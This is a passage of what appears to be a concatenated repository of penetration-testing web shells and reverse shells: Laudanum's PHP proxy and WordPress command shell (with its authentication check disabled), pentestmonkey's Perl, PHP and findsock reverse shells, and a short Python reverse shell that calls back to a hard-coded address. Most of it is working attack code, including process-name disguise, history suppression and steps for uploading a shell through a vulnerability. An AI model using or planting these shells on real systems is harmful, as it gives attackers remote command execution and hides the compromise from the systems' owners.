& 16 ) 195 | $i = strpos($gzData, "\0", $i) + 1; 196 | if ( $flg & 2 ) 197 | $i = $i + 2; 198 | } 199 | return @gzinflate( substr($gzData, $i, -8) ); 200 | } else { 201 | return false; 202 | } 203 | return false; 204 | } 205 | 206 | function rewrite ($d, $u) { 207 | $r = $d; 208 | //rewrite images and links - absolute reference 209 | $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); 210 | //rewrite images and links - hard linked 211 | $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); 212 | //rewrite images and links - relative reference 213 | $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); 214 | 215 | 216 | //rewrite form - absolute reference 217 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 218 | //rewrite form - hard linked 219 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 220 | //rewrite form - relative reference 221 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 222 | return $r; 223 | } 224 | 225 | /* Initialize some variables we need again and again. */ 226 | $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; 227 | if ($url == "") { 228 | $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; 229 | } 230 | 231 | if ($url == "") { 232 | ?> 233 | 235 | 236 | 237 | Laudanum PHP Proxy 238 | 239 | 240 | 245 | 246 | 247 | 248 |

Laudanum PHP Proxy

249 | 250 |
251 | 252 | 253 |
254 |
255 |
256 | Copyright © 2014, Kevin Johnson and the Laudanum team.
257 | Written by Tim Medin.
258 | Get the latest version at laudanum.secureideas.net. 259 |
260 | 261 | 262 | 263 | 337 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/settings.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a convenient menu of Laudanum tools from a Word Press settings 20 | *** page. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | ?> 42 | 43 | 44 |
45 |

Laudanum Tools

46 | 65 | * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" 66 |
67 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/shell.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides shell access to the system. It is built based on the 2.1 20 | *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler 21 | *** 22 | *** 23 | *** Updated by Tim Medin 24 | *** 25 | ******************************************************************************** 26 | *** This program is free software; you can redistribute it and/or 27 | *** modify it under the terms of the GNU General Public License 28 | *** as published by the Free Software Foundation; either version 2 29 | *** of the License, or (at your option) any later version. 30 | *** 31 | *** This program is distributed in the hope that it will be useful, 32 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | *** GNU General Public License for more details. 35 | *** 36 | *** You can get a copy of the GNU General Public License from this 37 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 39 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 40 | *** 41 | ***************************************************************************** */ 42 | 43 | 44 | include 'ipcheck.php'; 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. 
*/ 49 | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP Shell Access 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |
68 |
69 | Copyright © 2014, Kevin Johnson and the Laudanum team.
71 | Get the latest version at laudanum.secureideas.net. 72 |
73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | // set_error_handler('wpl_error_handler'); 80 | 81 | 82 | function logout() { 83 | $_SESSION = array('authenticated' => false); 84 | if (isset($_COOKIE[session_name()])) 85 | setcookie(session_name(), '', time()-42000, '/'); 86 | session_destroy(); 87 | } 88 | 89 | 90 | function wpl_stripslashes_deep($value) { 91 | if (is_array($value)) 92 | return array_map('stripslashes_deep', $value); 93 | else 94 | return stripslashes($value); 95 | } 96 | 97 | if (get_magic_quotes_gpc()) 98 | $_POST = stripslashes_deep($_POST); 99 | 100 | /* Initialize some variables we need again and again. */ 101 | //$username = isset($_POST['username']) ? $_POST['username'] : ''; 102 | //$password = isset($_POST['password']) ? $_POST['password'] : ''; 103 | //$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; 104 | 105 | $command = isset($_POST['command']) ? $_POST['command'] : ''; 106 | $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; 107 | $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; 108 | 109 | 110 | ///* Default settings --- these settings should always be set to something. */ 111 | //$default_settings = array('home-directory' => '.'); 112 | 113 | ///* Merge settings. */ 114 | //$ini['settings'] = array_merge($default_settings, $ini['settings']); 115 | 116 | 117 | session_start(); 118 | 119 | /* Delete the session data if the user requested a logout. This leaves the 120 | * session cookie at the user, but this is not important since we 121 | * authenticates on $_SESSION['authenticated']. */ 122 | if (isset($_POST['logout'])) 123 | logout(); 124 | 125 | ///* Attempt authentication. */ 126 | //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 127 | // isset($ini['users'][$username])) { 128 | // if (strchr($ini['users'][$username], ':') === false) { 129 | // // No seperator found, assume this is a password in clear text. 
130 | // $_SESSION['authenticated'] = ($ini['users'][$username] == $password); 131 | // } else { 132 | // list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); 133 | // $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); 134 | // } 135 | //} 136 | 137 | /* Attempt authentication. */ 138 | if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) 139 | $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); 140 | 141 | /* Enforce default non-authenticated state if the above code didn't set it 142 | * already. */ 143 | if (!isset($_SESSION['authenticated'])) 144 | $_SESSION['authenticated'] = false; 145 | 146 | if(true) { 147 | //if ($_SESSION['authenticated']) { 148 | /* Initialize the session variables. */ 149 | if (empty($_SESSION['cwd'])) { 150 | $_SESSION['cwd'] = '.'; 151 | $_SESSION['history'] = array(); 152 | $_SESSION['output'] = ''; 153 | } 154 | 155 | if (!empty($command)) { 156 | /* Save the command for late use in the JavaScript. If the command is 157 | * already in the history, then the old entry is removed before the 158 | * new entry is put into the list at the front. */ 159 | if (($i = array_search($command, $_SESSION['history'])) !== false) 160 | unset($_SESSION['history'][$i]); 161 | 162 | array_unshift($_SESSION['history'], $command); 163 | 164 | /* Now append the commmand to the output. */ 165 | $_SESSION['output'] .= '$ ' . $command . "\n"; 166 | 167 | /* Initialize the current working directory. */ 168 | if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { 169 | $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); 170 | } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { 171 | /* The current command is a 'cd' command which we have to handle 172 | * as an internal shell command. */ 173 | 174 | if ($regs[1]{0} == '/') { 175 | /* Absolute path, we use it unchanged. 
*/ 176 | $new_dir = $regs[1]; 177 | } else { 178 | /* Relative path, we append it to the current working 179 | * directory. */ 180 | $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; 181 | } 182 | 183 | /* Transform '/./' into '/' */ 184 | while (strpos($new_dir, '/./') !== false) 185 | $new_dir = str_replace('/./', '/', $new_dir); 186 | 187 | /* Transform '//' into '/' */ 188 | while (strpos($new_dir, '//') !== false) 189 | $new_dir = str_replace('//', '/', $new_dir); 190 | 191 | /* Transform 'x/..' into '' */ 192 | while (preg_match('|/\.\.(?!\.)|', $new_dir)) 193 | $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); 194 | 195 | if ($new_dir == '') $new_dir = '/'; 196 | 197 | /* Try to change directory. */ 198 | if (@chdir($new_dir)) { 199 | $_SESSION['cwd'] = $new_dir; 200 | } else { 201 | $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; 202 | } 203 | 204 | } elseif (trim($command) == 'exit') { 205 | logout(); 206 | } else { 207 | 208 | /* The command is not an internal command, so we execute it after 209 | * changing the directory and save the output. */ 210 | chdir($_SESSION['cwd']); 211 | 212 | // We canot use putenv() in safe mode. 213 | if (!ini_get('safe_mode')) { 214 | // Advice programs (ls for example) of the terminal size. 215 | putenv('ROWS=' . $rows); 216 | putenv('COLUMNS=' . $columns); 217 | } 218 | 219 | /* Alias expansion. */ 220 | $length = strcspn($command, " \t"); 221 | $token = substr($command, 0, $length); 222 | if (isset($ini['aliases'][$token])) 223 | $command = $ini['aliases'][$token] . substr($command, $length); 224 | 225 | $io = array(); 226 | $p = proc_open($command, 227 | array(1 => array('pipe', 'w'), 228 | 2 => array('pipe', 'w')), 229 | $io); 230 | 231 | /* Read output sent to stdout. */ 232 | while (!feof($io[1])) { 233 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 234 | ENT_COMPAT, 'UTF-8'); 235 | } 236 | /* Read output sent to stderr. 
*/ 237 | while (!feof($io[2])) { 238 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 239 | ENT_COMPAT, 'UTF-8'); 240 | } 241 | 242 | fclose($io[1]); 243 | fclose($io[2]); 244 | proc_close($p); 245 | } 246 | } 247 | 248 | /* Build the command history for use in the JavaScript */ 249 | if (empty($_SESSION['history'])) { 250 | $js_command_hist = '""'; 251 | } else { 252 | $escaped = array_map('addslashes', $_SESSION['history']); 253 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 254 | } 255 | } 256 | 257 | ?> 258 | 260 | 261 | 262 | Laudanum Shell 263 | 264 | 265 | 303 | 304 | 305 | 306 | 307 |

Laudanum Shell

308 | 309 |
310 | 311 | 320 | 321 |
322 | Authentication 323 | 324 | Login failed, please try again:

' . "\n"; 327 | else 328 | echo "

Please login:

\n"; 329 | ?> 330 | 331 |

Username:

333 | 334 |

Password:

335 | 336 |

337 | 338 | 339 | 340 |
341 | 342 | 343 | 344 |
345 | Current Working Directory: 348 | 349 | 350 |
351 | 358 |

359 | $  361 |

362 |
363 | 364 |

365 | Size: × 369 | 370 | 371 | 372 |

373 | 374 |
375 | 376 | 377 | 378 |
379 | 380 | 381 |
382 |
383 | Copyright © 2014, Kevin Johnson and the Laudanum team.
384 | Updated by Tim Medin.
385 | Get the latest version at laudanum.secureideas.net. 386 |
387 | 388 | 389 | 390 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-05-26 perl-reverse-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/COPYING.PERL-REVERSE-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/perl-reverse-shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | 38 | use strict; 39 | use Socket; 40 | use FileHandle; 41 | use POSIX; 42 | my $VERSION = "1.0"; 43 | 44 | # Where to send the reverse shell. Change these. 45 | my $ip = '127.0.0.1'; 46 | my $port = 1234; 47 | 48 | # Options 49 | my $daemon = 1; 50 | my $auth = 0; # 0 means authentication is disabled and any 51 | # source IP can access the reverse shell 52 | my $authorised_client_pattern = qr(^127\.0\.0\.1$); 53 | 54 | # Declarations 55 | my $global_page = ""; 56 | my $fake_process_name = "/usr/sbin/apache"; 57 | 58 | # Change the process name to be less conspicious 59 | $0 = "[httpd]"; 60 | 61 | # Authenticate based on source IP address if required 62 | if (defined($ENV{'REMOTE_ADDR'})) { 63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 64 | 65 | if ($auth) { 66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 67 | cgiprint("ERROR: Your client isn't authorised to view this page"); 68 | cgiexit(); 69 | } 70 | } 71 | } elsif ($auth) { 72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. 
Denying access"); 73 | cgiexit(0); 74 | } 75 | 76 | # Background and dissociate from parent process if required 77 | if ($daemon) { 78 | my $pid = fork(); 79 | if ($pid) { 80 | cgiexit(0); # parent exits 81 | } 82 | 83 | setsid(); 84 | chdir('/'); 85 | umask(0); 86 | } 87 | 88 | # Make TCP connection for reverse shell 89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 91 | cgiprint("Sent reverse shell to $ip:$port"); 92 | cgiprintpage(); 93 | } else { 94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 95 | cgiexit(); 96 | } 97 | 98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 99 | open(STDIN, ">&SOCK"); 100 | open(STDOUT,">&SOCK"); 101 | open(STDERR,">&SOCK"); 102 | $ENV{'HISTFILE'} = '/dev/null'; 103 | system("w;uname -a;id;pwd"); 104 | exec({"/bin/sh"} ($fake_process_name, "-i")); 105 | 106 | # Wrapper around print 107 | sub cgiprint { 108 | my $line = shift; 109 | $line .= "

\n"; 110 | $global_page .= $line; 111 | } 112 | 113 | # Wrapper around exit 114 | sub cgiexit { 115 | cgiprintpage(); 116 | exit 0; # 0 to ensure we don't give a 500 response. 117 | } 118 | 119 | # Form HTTP response using all the messages gathered by cgiprint so far 120 | sub cgiprintpage { 121 | print "Content-Length: " . length($global_page) . "\r 122 | Connection: close\r 123 | Content-Type: text\/html\r\n\r\n" . $global_page; 124 | } 125 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-09-02 php-findsock-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/COPYING.PHP-FINDSOCK-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/findsock.c: -------------------------------------------------------------------------------- 1 | // php-findsock-shell - A Findsock Shell implementation in PHP + C 2 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net 3 | // 4 | // This tool may be used for legal purposes only. Users take full responsibility 5 | // for any actions performed using this tool. The author accepts no liability 6 | // for damage caused by this tool. If these terms are not acceptable to you, then 7 | // do not use this tool. 
8 | // 9 | // In all other respects the GPL version 2 applies: 10 | // 11 | // This program is free software; you can redistribute it and/or modify 12 | // it under the terms of the GNU General Public License version 2 as 13 | // published by the Free Software Foundation. 14 | // 15 | // This program is distributed in the hope that it will be useful, 16 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | // GNU General Public License for more details. 19 | // 20 | // You should have received a copy of the GNU General Public License along 21 | // with this program; if not, write to the Free Software Foundation, Inc., 22 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 23 | // 24 | // You are encouraged to send comments, improvements or suggestions to 25 | // me at pentestmonkey@pentestmonkey.net 26 | // 27 | // Description 28 | // ----------- 29 | // (Pair of) Web server scripts that find the TCP socket being used by the 30 | // client to connect to the web server and attaches a shell to it. This 31 | // provides you, the pentester, with a fully interactive shell even if the 32 | // Firewall is performing proper ingress and egress filtering. 33 | // 34 | // Proper interactive shells are more useful than web-based shell in some 35 | // circumstances, e.g: 36 | // 1: You want to change your user with "su" 37 | // 2: You want to upgrade your shell using a local exploit 38 | // 3: You want to log into another system using telnet / ssh 39 | // 40 | // Limitations 41 | // ----------- 42 | // The shell traffic doesn't look much like HTTP, so I guess that you may 43 | // have problems if the site is being protected by a Layer 7 (Application layer) 44 | // Firewall. 45 | // 46 | // The shell isn't fully implemented in PHP: you also need to upload a 47 | // C program. 
You need to either: 48 | // 1: Compile the program for the appropriate OS / architecture then 49 | // upload it; or 50 | // 2: Upload the source and hope there's a C compiler installed. 51 | // 52 | // This is a pain, but I couldn't figure out how to implement the findsock 53 | // mechanism in PHP. Email me if you manage it. I'd love to know. 54 | // 55 | // Only tested on x86 / amd64 Gentoo Linux. 56 | // 57 | // Usage 58 | // ----- 59 | // See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck. 60 | // 61 | // Here are some brief instructions. 62 | // 63 | // 1: Compile findsock.c for use on the target web server: 64 | // $ gcc -o findsock findsock.c 65 | // 66 | // Bear in mind that the web server might be running a different OS / architecture to you. 67 | // 68 | // 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using 69 | // whichever upload vulnerability you've indentified. Both should be uploaded to the 70 | // same directory. 71 | // 72 | // 3: Run the shell from a netcat session (NOT a browser - remember this is an 73 | // interactive shell). 74 | // 75 | // $ nc -v target 80 76 | // target [10.0.0.1] 80 (http) open 77 | // GET /php-findsock-shell.php HTTP/1.0 78 | // 79 | // sh-3.2$ id 80 | // uid=80(apache) gid=80(apache) groups=80(apache) 81 | // sh-3.2$ 82 | // ... you now have an interactive shell ... 
83 | // 84 | 85 | #include 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | 92 | int main (int argc, char** argv) { 93 | // Usage message 94 | if (argc != 3) { 95 | printf("Usage: findsock ip port\n"); 96 | exit(0); 97 | } 98 | 99 | // Process args 100 | char *sock_ip = argv[1]; 101 | char *sock_port = argv[2]; 102 | 103 | // Declarations 104 | struct sockaddr_in rsa; 105 | struct sockaddr_in lsa; 106 | int size = sizeof(rsa); 107 | char remote_ip[30]; 108 | int fd; 109 | 110 | // Inspect all file handles 111 | for (fd=3; fd 89 | 90 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-05-26 php-reverse-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 
7 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | if ($debug) 
printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /simple_py_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # imports here 3 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 4 | # 5 | # This piece of software code is licensed under the FreeBSD license.. 6 | # 7 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 
import socket,subprocess
# Minimal Python 2 reverse shell, kept in this corpus as a detection / analysis
# reference: it dials out to a hard-coded address and executes every buffer it
# receives as a shell command, with no authentication or integrity check.
HOST = '172.16.32.137' # The remote host: hard-coded callback address (an IoC)
PORT = 443 # The same port as used by the server; plain TCP here, no TLS, so the
           # banner and all command/output traffic below are visible on the wire
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Outbound TCP connection to the hard-coded host/port (connect-back beacon).
s.connect((HOST, PORT))
# Cleartext banner announcing the connection -- a usable network signature.
s.send('[*] Connection Established!')
# Command loop: one 1024-byte recv per iteration; the literal "quit" ends it.
while 1:
    # receive one buffer of (untrusted, unauthenticated) input from the peer
    data = s.recv(1024)
    # the exact string "quit" is the only input that is not executed
    if data == "quit": break
    # The received buffer is handed verbatim to a shell (shell=True); on the
    # host this shows up as a socket-holding python process spawning shell
    # child processes, which is the process-tree signal to alert on.
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # Reads the child's stdout, then stderr, to EOF before replying.
    stdout_value = proc.stdout.read() + proc.stderr.read()
    # Command output goes back over the same cleartext socket.
    s.send(stdout_value)
# Close the socket once the loop ends.
s.close()
--------------------------------------------------------------------------------